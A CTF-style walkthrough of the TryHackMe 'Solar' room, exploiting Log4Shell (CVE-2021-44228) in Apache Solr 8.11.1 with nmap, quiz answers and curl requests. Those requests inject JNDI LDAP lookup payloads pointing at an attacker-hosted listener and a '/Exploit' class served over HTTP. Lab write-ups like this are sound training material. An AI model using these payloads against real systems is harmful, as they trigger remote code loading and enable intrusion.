CVE-2021-44228 Apache Solr 8.11.1

Exploiting log4j
┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ nmap solar.thm -p- -sC -sV
Exploiting log4j

What service is running on port 8983? (Just the name of the software) 

Apache Solr

Open the service running on port 8983 in your browser: 

┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ firefox http://solar.thm:8983
Exploiting log4j
SOLR GUI

What is the -Dsolr.log.dir argument set to, displayed on the front page? 

/var/solr/logs

Which file includes contains this repeated entry? (Just the filename itself, no path needed)

Exploiting log4j
solr.log

What “path” or URL endpoint is indicated in these repeated entries? 

/admin/cores

Viewing these log entries, what field name indicates some data entrypoint that you as a user could control? (Just the field name) 

params
┌──(rfs㉿PopLabSec)-[~/HackTheBox/THM_Solar]
└─$ curl 'http://solar.thm:8983/solr/admin/cores?foo=$\{jndi:ldap://10.8.154.49:9999\}'

What is the output of running this command? (You should leave this terminal window open as it will be actively awaiting connections)

Exploiting log4j
Listening on 0.0.0.0:1389
curl 'http://10.10.29.51:8983/solr/admin/cores?foo=$\{jndi:ldap://10.10.82.86:1389/Exploit\}'
python3 -m http.server
Exploiting log4j
Exploiting log4j
Exploiting log4j
Exploiting log4j

What is the full path of the specific solr.in.sh file? 

/etc/default/solr.in.sh

https://tryhackme.com/room/solar

Avatar of RFS

RFS (104)

old, Hacking Playgrounds, TryHackMe

Tagged in: